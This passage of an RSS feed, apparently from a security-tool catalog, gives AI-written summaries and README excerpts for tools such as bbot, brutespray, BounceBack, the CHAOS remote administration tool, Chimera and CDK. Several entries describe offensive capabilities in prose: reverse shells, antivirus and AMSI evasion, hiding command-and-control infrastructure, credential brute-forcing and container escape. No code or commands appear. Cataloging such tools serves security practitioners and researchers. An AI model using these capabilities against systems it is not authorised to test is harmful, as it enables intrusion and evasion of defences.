src="https://codecov.io/gh/blacklanternsecurity/bbot/branch/dev/graph/badge.svg?token=IR5AZBDM5K" alt="Codecov"&gt;&lt;/a&gt; &lt;a href="https://discord.com/invite/PZqkgxu5SA"&gt;&lt;img src="https://img.shields.io/discord/859164869970362439" alt="Discord"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="beebot-is-a-multipurpose-scanner-inspired-by-spiderfoot-built-to-automate-your-recon-bug-bounties-and-asm"&gt;&lt;strong&gt;BEE·bot&lt;/strong&gt; is a multipurpose scanner inspired by &lt;a href="https://github.com/smicallef/spiderfoot"&gt;Spiderfoot&lt;/a&gt;, built to automate your &lt;strong&gt;Recon&lt;/strong&gt;, &lt;strong&gt;Bug Bounties&lt;/strong&gt;, and &lt;strong&gt;ASM&lt;/strong&gt;!&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://github.com/blacklanternsecurity/bbot/assets/20261699/e539e89b-92ea-46fa-b893-9cde94eebf81"&gt;https://github.com/blacklanternsecurity/bbot/assets/20261699/e539e89b-92ea-46fa-b893-9cde94eebf81&lt;/a&gt;&lt;/p&gt;</description></item><item><title>bincat</title><link>https://rainmana.github.io/hackyfeed/tools/airbus-seclab-bincat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/airbus-seclab-bincat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BinCAT is a static binary code analysis toolkit designed to assist reverse engineers using IDA and Python automation. Its primary use cases include value and taint analysis, type reconstruction, and detection of memory management issues like use-after-free and double-free errors. Notable features include support for multiple CPU architectures, integration with IDA version 7.4 or later, and the ability to operate both locally and remotely via a web service.&lt;/p&gt;</description></item><item><title>binsider</title><link>https://rainmana.github.io/hackyfeed/tools/orhun-binsider/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/orhun-binsider/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Binsider is a versatile tool designed for reverse engineers, enabling both static and dynamic analysis of binary files through an intuitive terminal interface. Key functionalities include inspection of binary metadata, string analysis, examination of linked libraries, and detailed ELF layout analysis, all aimed at enhancing understanding of executable files.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-logo-dark.png#gh-dark-mode-only" width="300"&gt;&lt;/a&gt;
 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-logo-light.png#gh-light-mode-only" width="300"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-text-dark.png#gh-dark-mode-only" width="170"&gt;&lt;/a&gt;
 &lt;img src="https://raw.githubusercontent.com/orhun/binsider/main/website/src/assets/binsider-text-light.png#gh-light-mode-only" width="170"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;em&gt;"Swiss army knife for reverse engineers."&lt;/em&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/orhun/binsider/releases"&gt;
 &lt;img src="https://img.shields.io/github/v/release/orhun/binsider?style=flat&amp;labelColor=1d1d1d&amp;color=f8be75&amp;logo=GitHub&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;a href="https://crates.io/crates/binsider/"&gt;
 &lt;img src="https://img.shields.io/crates/v/binsider?style=flat&amp;labelColor=1d1d1d&amp;color=f8be75&amp;logo=Rust&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/orhun/binsider/actions?query=workflow%3A%22CI%22"&gt;
 &lt;img src="https://img.shields.io/github/actions/workflow/status/orhun/binsider/ci.yml?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;logo=GitHub%20Actions&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/orhun/binsider/actions?query=workflow%3A%22CD%22"&gt;
 &lt;img src="https://img.shields.io/github/actions/workflow/status/orhun/binsider/cd.yml?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;logo=GitHub%20Actions&amp;logoColor=white&amp;label=deploy"&gt;&lt;/a&gt;
 &lt;a href="https://hub.docker.com/r/orhunp/binsider"&gt;
 &lt;img src="https://img.shields.io/github/actions/workflow/status/orhun/binsider/docker.yml?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;label=docker&amp;logo=Docker&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;a href="https://docs.rs/binsider/"&gt;
 &lt;img src="https://img.shields.io/docsrs/binsider?style=flat&amp;labelColor=1d1d1d&amp;color=white&amp;logo=Rust&amp;logoColor=white"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;a href="https://discord.gg/zphNxEcEK7"&gt;
 &lt;img src="https://img.shields.io/discord/1289166752311148554?color=f8be75&amp;label=discord&amp;labelColor=1d1d1d&amp;logo=discord&amp;logoColor=white"&gt;&lt;/a&gt;
&lt;/p&gt;
&lt;h4 align="center"&gt;
 &lt;a href="https://binsider.dev/getting-started/"&gt;Documentation&lt;/a&gt; |
 &lt;a href="https://binsider.dev/"&gt;Website&lt;/a&gt;
&lt;/h4&gt;
&lt;p&gt;😼🕵️‍♂️ &lt;strong&gt;Binsider&lt;/strong&gt; can perform static and dynamic analysis, inspect strings, examine linked libraries, and perform hexdumps, all within a user-friendly terminal user interface!&lt;/p&gt;</description></item><item><title>black-hat-rust</title><link>https://rainmana.github.io/hackyfeed/tools/skerkour-black-hat-rust/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/skerkour-black-hat-rust/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Black Hat Rust is a specialized resource for understanding and implementing offensive security techniques using the Rust programming language. It covers a broad spectrum of offensive security concepts, including building custom tools for cyber attacks, phishing, and exploitation, while emphasizing practical application and real-world Rust programming practices. Notable features include multi-threaded attack surface discovery and async operations, making it suitable for both developers looking to enhance their security skills and security engineers aiming to leverage Rust for offensive purposes.&lt;/p&gt;</description></item><item><title>blackarch</title><link>https://rainmana.github.io/hackyfeed/tools/blackarch-blackarch/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/blackarch-blackarch/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BlackArch Linux is a penetration testing distribution based on Arch Linux, providing a repository of over 2,800 security tools organized by category. It offers flexible installation options, compatibility with existing Arch setups, and features a Live ISO for immediate testing. The toolset is aimed at penetration testers and security researchers for tasks such as forensics, reverse engineering, and network analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="table-of-contents"&gt;Table of Contents&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#description"&gt;Description&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#overview"&gt;Overview&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#download-and-installation"&gt;Download and Installation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#key-features"&gt;Key Features&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#installation-instruction"&gt;Installation Instruction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#usage"&gt;Usage&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#get-involved"&gt;Get Involved&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contributing"&gt;Contributing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#license"&gt;License&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#disclaimer"&gt;Disclaimer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#conclusion"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h1 id="description"&gt;Description&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;BlackArch Linux&lt;/strong&gt; is an Arch Linux–based penetration testing distribution for
penetration testers and security researchers. The repository contains &lt;a href="https://www.blackarch.org/tools.html"&gt;2850
tools&lt;/a&gt;. You can install tools individually
or in groups. BlackArch Linux is compatible with existing Arch installations.
For more information, see the installation instructions.&lt;/p&gt;</description></item><item><title>BlueTeam-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/a-poc-blueteam-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/a-poc-blueteam-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BlueTeam-Tools is a comprehensive repository comprising over 65 tools and resources tailored for blue teaming activities, encompassing tasks such as network discovery, vulnerability management, and security monitoring. Notable features include a variety of specialized scanners like Nmap and OpenVAS, as well as systems for data visualization and malicious traffic detection, aimed at enhancing defensive cybersecurity measures. This collection serves as an essential toolkit for security professionals focusing on threat detection and incident response.&lt;/p&gt;</description></item><item><title>bopscrk</title><link>https://rainmana.github.io/hackyfeed/tools/r3nt0n-bopscrk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r3nt0n-bopscrk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; bopscrk is a targeted wordlist generator designed for crafting customized password lists based on personal information related to a specific target. Its notable features include the ability to combine various word combinations, perform customizable case and leet transformations, and leverage lyrics from artists for enhanced wordlist creation, all accessible through an interactive mode or a command-line interface. The tool is included in the BlackArch Linux penetration testing distribution and is built with Python 3.&lt;/p&gt;</description></item><item><title>BounceBack</title><link>https://rainmana.github.io/hackyfeed/tools/d00movenok-bounceback/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/d00movenok-bounceback/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BounceBack is a versatile reverse proxy tool designed to enhance the security of red team operations by obfuscating the command-and-control (C2) or phishing infrastructure from detection by blue teams and security tools. It features a highly customizable filtering system that leverages real-time traffic analysis, extensive blacklists, and support for multiple protocols, enabling precise control over which traffic is allowed or denied. Notable capabilities include malleable C2 profile parsing, comprehensive IP address validation, domain fronting, and a robust logging mechanism for monitoring incoming requests and potential security threats.&lt;/p&gt;</description></item><item><title>breaking-and-pwning-apps-and-servers-aws-azure-training</title><link>https://rainmana.github.io/hackyfeed/tools/appsecco-breaking-and-pwning-apps-and-servers-aws-azure-training/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/appsecco-breaking-and-pwning-apps-and-servers-aws-azure-training/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Breaking and Pwning Apps and Servers on AWS and Azure&amp;rdquo; repository provides comprehensive, hands-on training for security testers and DevSecOps professionals focusing on vulnerability assessment and penetration testing within cloud environments. It includes structured documentation, setup files for creating student virtual machines, and additional resources to facilitate practical lab experiences in identifying and exploiting security weaknesses in AWS and Azure platforms. The training emphasizes real-world attack scenarios and techniques, making it a valuable resource for professionals aiming to bolster their cloud security expertise.&lt;/p&gt;</description></item><item><title>brutespray</title><link>https://rainmana.github.io/hackyfeed/tools/x90skysn3k-brutespray/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/x90skysn3k-brutespray/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Brutespray is a credential brute-forcing tool designed to automatically test default credentials against discovered services from various scan outputs, including Nmap and Nessus. It supports over 30 protocols and features capabilities such as multi-auth support, password spray mode, an interactive terminal UI, and resume functionality, allowing for efficient and comprehensive credential testing across networks. The tool is built in Go and offers extensive customization options through YAML configuration files and embedded wordlists.&lt;/p&gt;</description></item><item><title>Bug-Bounty-Methodology</title><link>https://rainmana.github.io/hackyfeed/tools/tuhin1729-bug-bounty-methodology/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tuhin1729-bug-bounty-methodology/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Bug-Bounty-Methodology is a collection of checklists designed for systematic bug bounty hunting. It covers various security testing scenarios, including 2FA testing, CAPTCHA bypass, CSRF protection, and OAuth misconfiguration, providing comprehensive guidelines for identifying vulnerabilities in web applications. Notable features include a structured compilation of methodologies tailored for different attack vectors and documentation that serves as a practical resource for penetration testers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="bug-bounty-methodology"&gt;Bug-Bounty-Methodology&lt;/h1&gt;
&lt;p&gt;These are my checklists which I use during my bug bounty hunting.&lt;/p&gt;</description></item><item><title>burpgpt</title><link>https://rainmana.github.io/hackyfeed/tools/aress31-burpgpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aress31-burpgpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; BurpGPT is an advanced security extension that integrates with Burp Suite to analyze web traffic using AI-driven techniques, specifically utilizing OpenAI&amp;rsquo;s models to uncover security vulnerabilities that conventional scanners may overlook. Its notable features include customizable prompts for tailored analysis, automated report generation summarizing potential security issues, and granular control over the analysis parameters. This tool streamlines the vulnerability assessment process, improving the efficiency and accuracy of security professionals while handling the complexities of web application security.&lt;/p&gt;</description></item><item><title>buster</title><link>https://rainmana.github.io/hackyfeed/tools/sham00n-buster/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/sham00n-buster/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Buster is a comprehensive Open Source Intelligence (OSINT) tool designed for email reconnaissance, capable of gathering social account links, breaches, and associated domains for a given email address. Notable features include the ability to generate potential emails and usernames, verify existing emails, and query various online sources and databases for comprehensive results. The tool is particularly useful for security researchers and investigators needing to gather detailed information on individuals or validate email addresses.&lt;/p&gt;</description></item><item><title>caddy-waf</title><link>https://rainmana.github.io/hackyfeed/tools/fabriziosalmi-caddy-waf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/fabriziosalmi-caddy-waf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Caddy WAF is a customizable middleware for the Caddy web server that functions as a Web Application Firewall, designed to provide advanced protection against a wide range of web-based threats. Key features include regex-based filtering, IP blacklisting, geo-blocking, rate limiting, anomaly scoring, and detailed monitoring capabilities, all aimed at securing applications while ensuring high performance through techniques like zero-copy networking and wait-free concurrency. The tool also supports seamless dynamic configuration reloads and offers precise insights into traffic and security events, making it a robust solution for safeguarding web applications.&lt;/p&gt;</description></item><item><title>cai</title><link>https://rainmana.github.io/hackyfeed/tools/aliasrobotics-cai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aliasrobotics-cai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cybersecurity AI (CAI) is a robust framework designed for enhancing cybersecurity measures by leveraging artificial intelligence. Its primary use case involves threat detection and incident response, making it suitable for both community and professional environments. Notable features include multi-platform support, advanced token management in the Professional Edition, and real-time performance benchmarks that are accessible for evaluation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cybersecurity-ai-cai"&gt;Cybersecurity AI (&lt;code&gt;CAI&lt;/code&gt;)&lt;/h1&gt;
&lt;div align="center"&gt;
 &lt;p&gt;
 &lt;a align="center" href="" target="https://github.com/aliasrobotics/CAI"&gt;
 &lt;img
 width="100%"
 src="https://github.com/aliasrobotics/cai/raw/main/media/cai.png"
 &gt;
 &lt;/a&gt;
 &lt;/p&gt;
&lt;p&gt;&lt;a href="https://trendshift.io/repositories/14317" target="_blank"&gt;&lt;img src="https://trendshift.io/api/badge/repositories/14317" alt="aliasrobotics%2Fcai | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/&gt;&lt;/a&gt;
&lt;a href="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-starred-top-3" target="_blank"&gt;&lt;img src="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-starred-top-3" alt="European Open Source - Most Starred Top 3" style=" height: 75px;" height="75"/&gt;&lt;/a&gt;
&lt;a href="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-forked-top-3" target="_blank"&gt;&lt;img src="https://defiant.vc/api/european-open-source/badge?domain=aliasrobotics.com&amp;style=most-forked-top-3" alt="European Open Source - Most Forked Top 3" style="height: 75px;" height="75"/&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>cameradar</title><link>https://rainmana.github.io/hackyfeed/tools/ullaakut-cameradar/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ullaakut-cameradar/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cameradar is a tool designed for scanning RTSP endpoints on authorized targets, utilizing dictionary attacks to discover credentials and stream routes. Its primary use case is to assess the security of RTSP streams by detecting open hosts, identifying device models, and generating comprehensive reports of findings. Notable features include the ability to enumerate multiple RTSP stream routes and credentials through customizable dictionaries, as well as support for Docker for streamlined deployment.&lt;/p&gt;</description></item><item><title>CAPEv2</title><link>https://rainmana.github.io/hackyfeed/tools/kevoreilly-capev2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kevoreilly-capev2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CAPE (Malware Configuration And Payload Extraction) is an advanced malware sandbox designed to execute and analyze malicious files in an isolated environment while capturing dynamic behavior and forensic artifacts. Key features include automated malware unpacking, YARA signature-based classification, comprehensive API hooking for behavioral instrumentation, and detailed memory and network traffic analysis. CAPE enhances traditional sandboxes with interactive desktop capabilities and sophisticated unpacking techniques, making it a powerful tool for malware research and analysis.&lt;/p&gt;</description></item><item><title>capsulecorp-pentest</title><link>https://rainmana.github.io/hackyfeed/tools/r3dy-capsulecorp-pentest/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r3dy-capsulecorp-pentest/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Capsulecorp Pentest is a pre-configured virtual network environment designed for learning network penetration testing, utilizing Vagrant and Ansible to deploy five virtual machines, including a Linux attacker and four Windows 2019 servers with vulnerable services. This tool streamlines the setup process, allowing users to quickly launch a fully functional Active Directory domain for educational purposes, with included features like a vulnerable Jenkins server, Apache Tomcat, and Metasploit. Its primary use case is to facilitate hands-on pentesting practice in a controlled environment, enhancing learning efficiency.&lt;/p&gt;</description></item><item><title>CatSniffer</title><link>https://rainmana.github.io/hackyfeed/tools/electroniccats-catsniffer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/electroniccats-catsniffer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CatSniffer is a versatile multiprotocol and multiband hardware tool designed for the sniffing, communication, and exploitation of Internet of Things (IoT) devices. It supports various wireless technologies, including LoRa, Sub-1 GHz, and 2.4 GHz, and is compatible with multiple third-party software applications, allowing customization and extensive functionality for IoT security researchers and developers. Key features include a built-in USB-UART bridge, support for various protocols, and a flexible design that enables the integration of different antennas and easy programming.&lt;/p&gt;</description></item><item><title>CDK</title><link>https://rainmana.github.io/hackyfeed/tools/cdk-team-cdk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cdk-team-cdk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CDK is a zero dependency container penetration toolkit designed for security testing, enabling stable exploitation across slimmed containers. Its primary use case revolves around container escaping, persistence, and lateral movement within Kubernetes clusters, featuring modules for evaluating container weaknesses, executing various exploits, and providing essential network tools. Notable capabilities include information gathering, direct interaction with the container&amp;rsquo;s environment, and the ability to initiate and manage attacks seamlessly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cdk---zero-dependency-container-penetration-toolkit"&gt;CDK - Zero Dependency Container Penetration Toolkit&lt;/h1&gt;
&lt;p&gt;English | &lt;a href="https://github.com/cdk-team/CDK/wiki/CDK-Home-CN"&gt;简体中文&lt;/a&gt;&lt;/p&gt;</description></item><item><title>censys-subdomain-finder</title><link>https://rainmana.github.io/hackyfeed/tools/christophetd-censys-subdomain-finder/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/christophetd-censys-subdomain-finder/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Censys Subdomain Finder is a command-line tool designed to enumerate subdomains associated with a specified domain using Certificate Transparency logs from Censys. It retrieves subdomains that have ever been issued an SSL certificate by a public Certificate Authority, offering features such as output to a text file and support for API authentication. Notably, users must set up an account with Censys to access the API, as free accounts will face limitations beginning in late 2024.&lt;/p&gt;</description></item><item><title>cent</title><link>https://rainmana.github.io/hackyfeed/tools/xm1k3-cent/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xm1k3-cent/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cent is a tool designed to organize community-contributed Nuclei templates, simplifying the process of managing and utilizing these resources for vulnerability scanning. Key features include the ability to clone templates from multiple repositories, validate their integrity, and generate detailed summaries of the templates&amp;rsquo; metadata, including statistics on validation and severity distribution. Additionally, Cent supports multi-threading for efficient repository management and offers commands for initializing configurations, updating templates, and accessing versioning information.&lt;/p&gt;</description></item><item><title>chain-bench</title><link>https://rainmana.github.io/hackyfeed/tools/aquasecurity-chain-bench/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aquasecurity-chain-bench/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Chain-bench is an open-source tool designed for auditing software supply chain security compliance based on the CIS Software Supply Chain benchmark. It examines the entire Software Development Life Cycle (SDLC) to identify risks from code inception to deployment, ensuring adherence to organizational security policies. Notable features include CLI-based scanning capabilities, integration options with various SCM platforms, and support for Docker deployment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
&lt;picture&gt;
 &lt;source media="(prefers-color-scheme: dark)" srcset="docs/imgs/banner_dm.png"&gt;
 &lt;source media="(prefers-color-scheme: light)" srcset="docs/imgs/banner_lm.png"&gt;
 &lt;img alt="chain-bench logo" src="docs/imgs/banner_lm.png"&gt;
&lt;/picture&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;p&gt;&lt;a href="https://github.com/aquasecurity/chain-bench/blob/main/docs/"&gt;📖 Documentation&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Chain-bench is an open-source tool for auditing your software supply chain stack for security compliance based on a new
&lt;a href="docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf"&gt;CIS Software Supply Chain benchmark&lt;/a&gt;.
The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. To win the race against hackers and protect your sensitive data and customer trust, you need to ensure your code is compliant with your organization’s policies.&lt;/p&gt;</description></item><item><title>changeme</title><link>https://rainmana.github.io/hackyfeed/tools/ztgrace-changeme/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ztgrace-changeme/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; changeme is a default credential scanner designed to identify default and backdoor credentials, with a focus beyond common credentials. It features support for multiple protocols, including HTTP, MSSQL, MySQL, PostgreSQL, SSH, SNMP, and FTP, and allows users to easily configure new credentials via YAML files without code changes. The tool offers flexible target loading options and can run efficiently using Docker, particularly with Redis as a queue backend, making it suitable for diverse scanning tasks across network environments.&lt;/p&gt;</description></item><item><title>CHAOS</title><link>https://rainmana.github.io/hackyfeed/tools/tiagorlampert-chaos/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tiagorlampert-chaos/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CHAOS is an open-source Remote Administration Tool developed in Golang, designed for generating binaries that facilitate control over remote operating systems. It features robust capabilities such as reverse shell access, file manipulation (upload, download, delete), remote system information retrieval, and several system control functions like shutdown and restart, making it a versatile tool for remote administration tasks across both Windows and Linux platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;a href="#"&gt;
 &lt;img src="https://raw.githubusercontent.com/tiagorlampert/CHAOS/master/public/logo.png" alt="CHAOS logo" width="400" height="130"&gt;
 &lt;/a&gt;
&lt;/p&gt;
&lt;h1 align="center"&gt;CHAOS: Remote Administration Tool&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;a href="https://golang.org/"&gt;
 &lt;img src="https://img.shields.io/badge/Golang-1.18+-blue.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/tiagorlampert/CHAOS/releases"&gt;
 &lt;img src="https://img.shields.io/badge/Release-v5 Beta-red.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/tiagorlampert/CHAOS/blob/master/LICENSE"&gt;
 &lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://hub.docker.com/r/tiagorlampert/chaos"&gt;
 &lt;img src="https://img.shields.io/docker/pulls/tiagorlampert/chaos.svg?style=flat-square"&gt;
 &lt;/a&gt;
 &lt;a href="https://opensource.org"&gt;
 &lt;img src="https://img.shields.io/badge/Open%20Source-%E2%9D%A4-brightgreen.svg?style=flat-square"&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Chimera</title><link>https://rainmana.github.io/hackyfeed/tools/tokyoneon-chimera/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tokyoneon-chimera/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Chimera is a PowerShell obfuscation script designed to evade Detection and AMSI mechanisms by transforming potentially malicious PowerShell scripts into less recognizable forms. Its primary use case is for penetration testing and research into bypassing antivirus signatures, utilizing advanced techniques like string substitution and variable concatenation. Notable features include the capability to digest and obfuscate known malicious scripts while effectively bypassing security detection tools, thereby demonstrating the vulnerabilities in existing AV signatures.&lt;/p&gt;</description></item><item><title>clairvoyance</title><link>https://rainmana.github.io/hackyfeed/tools/nikitastupin-clairvoyance/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nikitastupin-clairvoyance/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Clairvoyance is a tool designed to extract GraphQL API schemas even when introspection is disabled, thereby facilitating schema discovery in environments such as production where introspection is typically forbidden. It outputs the schema in a JSON format compatible with other visualization and analysis tools, and it can be easily installed via pip or Docker, allowing users to customize their schema extraction processes using various wordlists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="clairvoyance"&gt;Clairvoyance&lt;/h1&gt;
&lt;p&gt;Obtain GraphQL API schema even if the introspection is disabled.&lt;/p&gt;</description></item><item><title>claude-bug-bounty</title><link>https://rainmana.github.io/hackyfeed/tools/shuvonsec-claude-bug-bounty/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shuvonsec-claude-bug-bounty/</guid><description>&lt;blockquote&gt;
